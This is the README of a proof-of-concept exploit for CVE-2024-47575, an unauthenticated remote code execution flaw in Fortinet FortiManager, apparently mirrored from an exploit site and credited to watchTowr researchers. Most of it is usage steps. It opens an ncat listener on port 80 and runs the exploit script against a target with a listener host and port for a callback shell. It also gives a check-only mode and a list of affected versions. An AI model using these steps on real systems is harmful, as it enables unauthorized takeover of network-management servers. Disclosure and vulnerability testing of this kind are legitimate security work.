Share
## https://sploitus.com/exploit?id=AA6D1851-7428-5CE9-BD93-9C981AFDF0B6
# CVE-2024-47575
Fortinet FortiManager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575
See our [blog post](http://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575) for technical details
To begin, establish your ncat session:
```
nc -lvvnp 80
```
Then, execute our detection artefact generator:
```
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
```
To check vulnerability alone, use the following options:
```
python3 CVE-2024-47575.py --target 192.168.1.110 --action check
```
# Affected Versions
```
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
```
# Exploit authors
This exploit was written by [Sina Kheirkhah (@SinSinology)](https://x.com/SinSinology) of [watchTowr (@watchtowrcyber)](https://twitter.com/watchtowrcyber)
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber